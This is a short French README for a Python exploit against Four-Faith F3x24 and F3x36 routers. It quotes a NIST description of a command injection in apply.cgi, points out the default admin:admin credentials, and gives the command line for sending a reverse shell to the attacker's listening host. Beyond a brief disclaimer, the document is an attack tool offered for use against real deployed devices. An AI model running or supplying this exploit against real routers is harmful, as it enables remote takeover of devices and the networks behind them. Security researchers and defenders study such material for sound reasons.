
Un exploit pour les routeurs Four-Faith afin d'obtenir un reverse shell.
Il s'agit d'un exploit pour les routeurs Four-Faith des modèles F3x24 et F3x36 permettant d'obtenir un shell inversé.
« Les routeurs Four-Faith des modèles F3x24 et F3x36 sont affectés par une vulnérabilité d'injection de commandes dans le système d'exploitation (OS). Au moins la version 2.0 du firmware permet à des attaquants authentifiés et distants d'exécuter des commandes OS arbitraires via HTTP lors de la modification de l'heure système via apply.cgi. De plus, cette version du firmware possède des identifiants par défaut qui, s'ils ne sont pas modifiés, transformeraient effectivement cette vulnérabilité en un problème d'exécution de commandes OS à distance sans authentification. »
Source : nist.gov
Ce script est basé sur une charge utile observée par VulnCheck
Avant d'exécuter l'exploit, démarrez un serveur TCP sur votre machine.
Ensuite, exécutez
python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT
Où
RHOST est l'adresse IP distante. Vous pouvez également ajouter un domaine.LHOST est l'IP de votre serveur TCP sur votre machine.LPORT est le port de votre serveur TCP.USERNAME et PASSWORD sont les identifiants du routeur. La valeur par défaut est admin:admin.RPORT est le port distant du routeur. La valeur par défaut est 80.Assurez-vous d'utiliser cet exploit uniquement pour des tests et dans des environnements autorisés.
Ne l'utilisez jamais à des fins malveillantes.